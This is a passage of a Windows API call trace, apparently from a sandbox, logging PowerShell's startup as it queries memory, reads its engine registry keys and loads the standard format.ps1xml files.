	[0054.052] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.052] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.053] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.053] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.053] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.056] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.060] VirtualQuery (in: lpAddress=0x22d258, lpBuffer=0x22e258, dwLength=0x1c | out: lpBuffer=0x22e258*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.060] VirtualQuery (in: lpAddress=0x22d258, lpBuffer=0x22e258, dwLength=0x1c | out: lpBuffer=0x22e258*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.061] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.063] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.087] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.088] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.088] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0054.100] GetLastError () returned 0xcb
	[0054.136] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.147] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.147] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.148] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.148] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.150] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.150] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.154] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.156] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.159] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e3dc | out: phkResult=0x22e3dc*=0x32c) returned 0x0
	[0054.159] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x22e444, lpData=0x0, lpcbData=0x22e440*=0x0 | out: lpType=0x22e444*=0x1, lpData=0x0, lpcbData=0x22e440*=0x74) returned 0x0
	[0054.159] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x22e424, lpData=0x0, lpcbData=0x22e420*=0x0 | out: lpType=0x22e424*=0x1, lpData=0x0, lpcbData=0x22e420*=0x74) returned 0x0
	[0054.159] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x22e424, lpData=0x3c3520, lpcbData=0x22e420*=0x74 | out: lpType=0x22e424*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x22e420*=0x74) returned 0x0
	[0054.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x22dfa4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0054.159] GetLastError () returned 0xcb
	[0054.159] SetErrorMode (uMode=0x1) returned 0x1
	[0054.160] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x22e424 | out: lpFileInformation=0x22e424*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0054.160] GetLastError () returned 0xcb
	[0054.160] SetErrorMode (uMode=0x1) returned 0x1
	[0054.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22df98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.161] GetLastError () returned 0xcb
	[0054.161] SetErrorMode (uMode=0x1) returned 0x1
	[0054.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22e418 | out: lpFileInformation=0x22e418*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0054.161] GetLastError () returned 0xcb
	[0054.161] SetErrorMode (uMode=0x1) returned 0x1
	[0054.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22df98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0054.161] GetLastError () returned 0xcb
	[0054.161] SetErrorMode (uMode=0x1) returned 0x1
	[0054.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22e418 | out: lpFileInformation=0x22e418*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0054.162] GetLastError () returned 0xcb
	[0054.162] SetErrorMode (uMode=0x1) returned 0x1
	[0054.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22df98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.162] GetLastError () returned 0xcb
	[0054.162] SetErrorMode (uMode=0x1) returned 0x1
	[0054.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22e418 | out: lpFileInformation=0x22e418*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0054.162] GetLastError () returned 0xcb
	[0054.162] SetErrorMode (uMode=0x1) returned 0x1
	[0054.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22df98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.162] GetLastError () returned 0xcb
	[0054.162] SetErrorMode (uMode=0x1) returned 0x1
	[0054.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22e418 | out: lpFileInformation=0x22e418*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0054.162] GetLastError () returned 0xcb
	[0054.162] SetErrorMode (uMode=0x1) returned 0x1
	[0054.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22df98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0054.162] GetLastError () returned 0xcb
	[0054.162] SetErrorMode (uMode=0x1) returned 0x1
	[0054.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22e418 | out: lpFileInformation=0x22e418*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0054.163] GetLastError () returned 0xcb
	[0054.163] SetErrorMode (uMode=0x1) returned 0x1
	[0054.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22df98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0054.163] GetLastError () returned 0xcb
	[0054.163] SetErrorMode (uMode=0x1) returned 0x1
	[0054.163] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22e418 | out: lpFileInformation=0x22e418*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0054.163] GetLastError () returned 0xcb
	[0054.163] SetErrorMode (uMode=0x1) returned 0x1
	[0054.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22df98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0054.163] GetLastError () returned 0xcb
	[0054.163] SetErrorMode (uMode=0x1) returned 0x1
	[0054.163] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22e418 | out: lpFileInformation=0x22e418*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0054.163] GetLastError () returned 0xcb
	[0054.163] SetErrorMode (uMode=0x1) returned 0x1
	[0054.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22df98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0054.163] GetLastError () returned 0xcb
	[0054.163] SetErrorMode (uMode=0x1) returned 0x1
	[0054.163] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22e418 | out: lpFileInformation=0x22e418*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0054.163] GetLastError () returned 0xcb
	[0054.163] SetErrorMode (uMode=0x1) returned 0x1
	[0054.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22df98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0054.164] GetLastError () returned 0xcb
	[0054.164] SetErrorMode (uMode=0x1) returned 0x1
	[0054.164] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22e418 | out: lpFileInformation=0x22e418*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0054.164] GetLastError () returned 0xcb
	[0054.164] SetErrorMode (uMode=0x1) returned 0x1
	[0054.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0054.166] GetLastError () returned 0xcb
	[0054.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0054.176] GetLastError () returned 0xcb
	[0054.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0054.176] GetLastError () returned 0xcb
	[0054.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0054.180] GetLastError () returned 0xcb
	[0054.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.259] GetLastError () returned 0xcb
	[0054.259] SetErrorMode (uMode=0x1) returned 0x1
	[0054.259] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0054.259] GetLastError () returned 0x0
	[0054.259] GetFileType (hFile=0x2fc) returned 0x1
	[0054.259] SetErrorMode (uMode=0x1) returned 0x1
	[0054.260] GetFileType (hFile=0x2fc) returned 0x1
	[0054.260] ReadFile (in: hFile=0x2fc, lpBuffer=0x231de48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x231de48*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.262] GetLastError () returned 0x0
	[0054.262] ReadFile (in: hFile=0x2fc, lpBuffer=0x231de48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x231de48*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.262] GetLastError () returned 0x0
	[0054.263] ReadFile (in: hFile=0x2fc, lpBuffer=0x231de48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x231de48*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.263] GetLastError () returned 0x0
	[0054.263] ReadFile (in: hFile=0x2fc, lpBuffer=0x231de48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x231de48*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.263] GetLastError () returned 0x0
	[0054.263] ReadFile (in: hFile=0x2fc, lpBuffer=0x231de48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x231de48*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.263] GetLastError () returned 0x0
	[0054.263] ReadFile (in: hFile=0x2fc, lpBuffer=0x231de48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x231de48*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.263] GetLastError () returned 0x0
	[0054.263] ReadFile (in: hFile=0x2fc, lpBuffer=0x231de48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x231de48*, lpNumberOfBytesRead=0x22e294*=0x9e2, lpOverlapped=0x0) returned 1
	[0054.264] GetLastError () returned 0x0
	[0054.264] ReadFile (in: hFile=0x2fc, lpBuffer=0x231d3ca, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x231d3ca*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.264] GetLastError () returned 0x0
	[0054.264] ReadFile (in: hFile=0x2fc, lpBuffer=0x231de48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x231de48*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.264] GetLastError () returned 0x0
	[0054.264] CloseHandle (hObject=0x2fc) returned 1
	[0054.264] GetLastError () returned 0x0
	[0054.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.264] GetLastError () returned 0x0
	[0054.264] SetErrorMode (uMode=0x1) returned 0x1
	[0054.264] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x232ef04 | out: lpFileInformation=0x232ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0054.264] GetLastError () returned 0x0
	[0054.264] SetErrorMode (uMode=0x1) returned 0x1
	[0054.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.264] GetLastError () returned 0x0
	[0054.264] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e218 | out: phkResult=0x22e218*=0x2fc) returned 0x0
	[0054.264] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x0, lpcbData=0x22e25c*=0x0 | out: lpType=0x22e260*=0x1, lpData=0x0, lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.264] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x3c3520, lpcbData=0x22e25c*=0x56 | out: lpType=0x22e260*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.265] RegCloseKey (hKey=0x2fc) returned 0x0
	[0054.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.265] GetLastError () returned 0x0
	[0054.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.265] GetLastError () returned 0x0
	[0054.276] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xd44a5cb9, Data2=0x9002, Data3=0x47a6, Data4=([0]=0x84, [1]=0x81, [2]=0xaa, [3]=0x50, [4]=0x8e, [5]=0xb3, [6]=0x53, [7]=0xf4))) returned 0x0
	[0054.285] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x99547ea5, Data2=0x9e93, Data3=0x4f0e, Data4=([0]=0x95, [1]=0x63, [2]=0x72, [3]=0x9d, [4]=0x11, [5]=0x15, [6]=0x76, [7]=0x26))) returned 0x0
